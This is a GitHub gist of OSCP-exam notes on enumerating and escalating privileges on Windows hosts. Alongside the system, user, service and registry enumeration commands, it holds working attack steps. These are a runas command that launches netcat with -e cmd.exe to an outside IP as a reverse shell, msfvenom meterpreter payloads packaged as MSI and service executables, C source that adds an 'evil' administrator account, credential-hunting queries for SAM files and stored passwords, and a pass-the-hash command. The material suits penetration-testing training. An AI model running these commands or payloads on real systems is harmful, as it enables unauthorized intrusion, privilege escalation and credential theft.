Skip to content

Instantly share code, notes, and snippets.

@ssstonebraker

ssstonebraker/OSCP_Windows_Enumeration.md

Created June 23, 2020 13:51
Show Gist options
  • Star 5 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
  • Save ssstonebraker/33137b8c56ea0ea57cad462ca0ee6ee3 to your computer and use it in GitHub Desktop.
Save ssstonebraker/33137b8c56ea0ea57cad462ca0ee6ee3 to your computer and use it in GitHub Desktop.
Download ZIP
OSCP_Windows_Enumeration.md
Raw
OSCP_Windows_Enumeration.md

[TOC]

Windows Initial Checks

Basic Info

hostname
systeminfo
whoami

Global path

If any part of the SYSTEM %PATH% variable is writeable by Authenticated Users, privesc exists

Many applications don't use full path

If system32 is not first entry in path this is bad

reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment

Applications

wmic product get name, version, vendor

Patch Level

systeminfo  
wmic qfe get Caption,Description,HotFixID,InstalledOn

Users and Groups

Info about current user

whoami  
echo %USERNAME%  
net user %USERNAME%

Local

List all Local Users

net user

List all Local Groups

net localgroup

Check who is a member of the local group "Administrators"

net localgroup Administrators

Adding users and groups

net user kali kali1234 /add
net localgroup administrators kali /add
net localgroup "Remote Desktop Users" kali /add

Domain

Users in a domain

net user /domain

Groups in a domain

net group /domain  
net group /domain <Group Name>

Check RID

wmic useraccount where (name='Guest') get name,sid

Network Info

Firewall

netsh firewall show state  
netsh firewall show config  
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

Network Details

ipconfig /all  
route print  
arp -A  
netstat -ano

Find Readable/Writable Files and Directories

accesschk.exe -uws "Everyone" "C:\Program Files"

Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

Show Unmounted Disks

mountvol

mountvol c:\test \\?\Volume{93131ba8-0000-0000-0000-100000000000}\

Enumerating Device Drivers and Kernel Modules

powershell
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Dis
play Name’, ‘Start Mode’, Path

Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, D riverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

Binaries That AutoElevate

If these are set we could run an msi to elevate privleges

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Insta ller

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Scheduled Tasks

Basic info

schtasks /query /fo LIST

List only task names

schtasks /query /fo LIST 2>nul | findstr TaskName

Verbose

schtasks /query /fo LIST /v

Parsing Verbose output

copy output and save in txt on kali machine

cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM

Tasks on disk

dir c:\windows\tasks\  
dir c:\windows\system32\tasks\

Info on specific task

schtasks /query /v /fo list /tn "\System Maintenance"

Paswords in files

https://pentestlab.blog/tag/privilege-escalation/page/3/

cmdkey

If there are entries, it means that we may able to runas certain user who stored his cred in windows

cmdkey /list 
runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \\IP\share\nc.exe -nv 10.10.14.2 80 -e cmd.exe"

SAM Files

%SYSTEMROOT%\repair\SAM  
%SYSTEMROOT%\System32\config\RegBack\SAM  
%SYSTEMROOT%\System32\config\SAM  
%SYSTEMROOT%\repair\system  
%SYSTEMROOT%\System32\config\SYSTEM  
%SYSTEMROOT%\System32\config\RegBack\system

Raw text search

findstr /si password *.xml *.ini *.txt
findstr /si pass/pwd *.ini  

dir /s *pass* == *cred* == *vnc* == *.config*  
findstr /spin "password" *.*  
findstr /spin "password" *.*

Common files to check

c:\sysprep.inf  
c:\sysprep\sysprep.xml  
c:\unattend.xml  
%WINDIR%\Panther\Unattend\Unattended.xml  
%WINDIR%\Panther\Unattended.xml  

dir /b /s unattend.xml  
dir /b /s web.config  
dir /b /s sysprep.inf  
dir /b /s sysprep.xml  
dir /b /s *pass*  

dir c:\*vnc.ini /s /b  
dir c:\*ultravnc.ini /s /b   
dir c:\ /s /b | findstr /si *vnc.ini

Windows Registry Queries

VNC

reg query "HKCU\Software\ORL\WinVNC3\Password"  
reg query "HKCU\Software\TightVNC\Server"

Windows autologin

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"  
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

SNMP Paramters

reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

Putty

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

Search for password in registry

reg query HKLM /f password /t REG_SZ /s  
reg query HKCU /f password /t REG_SZ /s

AlwaysInstallElevated

If 64 bits use: %SystemRoot%\Sysnative\reg.exe

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated  
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

Exploitation

Kali VM

1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
7. Copy the generated file, setup.msi, to the Windows VM.

Windows VM

1.Place ‘setup.msi’ in ‘C:\Temp’.
2.Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi

Services

Find Non-Standard Services

Requires powershell

Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr /v /i "Microsoft" | findstr /v /i "windows" | findstr /v /i "vmware"

Unquoted Service Path

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

Kali VM

Note: On x64 machine you should use bat2exe.bat to create 64 bit executable

1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
2. Copy the generated file, common.exe, to the Windows VM.

Windows VM

1. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Start mode of service

wmic service where caption="Serviio" get name, caption, state, startmode

Permissions for all services

accesschk.exe -uwcqv * /accepteula

Weak Service Permissions

Find Services that can be modified

accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Power Users" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula

Permission for service exe file

icacls "C:\Program Files\Serviio\bin\ServiioService.exe"

wmic

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\service_exes.txt

echo "" > c:\windows\temp\exe_permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\service_exes.txt) do cmd.exe /c icacls "%a" >> c:\windows\temp\exe_permissions.txt

sc

Service Details

sc qc \<Service Name>

Service Permissions

accesschk.exe -ucqv \<Service Name>

Output Service Info

sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt  
FOR /F %i in (Servicenames.txt) DO echo %i  

FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt  
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

File Permissions

Check permissions on file (Look for W or F tag) and substitute if possible

icacls scsiaccess.exe

Registry Key permissions

subinacl /keyreg HKEY_LOCAL_MACHINE/software/microsoft

Exe to add user to server

Write and compile malicious exe file to add a user to the system as an admin

Contents of adduser.c

#include <stdlib.h>

int main ()
{

	int i;

	i = system ("net user evil Ev!lpass /add");
	i = system ("net localgroup administrators evil /add");

		return 0;
}

Compile adduser.c on kali

sudo i686-w64-mingw32-gcc adduser.c -o adduser.exe

Pass the Hash

Use the NTLM hash to authenticate

pth-winexe -U offsec%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2 eb3b9f05c425e //10.11.0.22 cmd
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment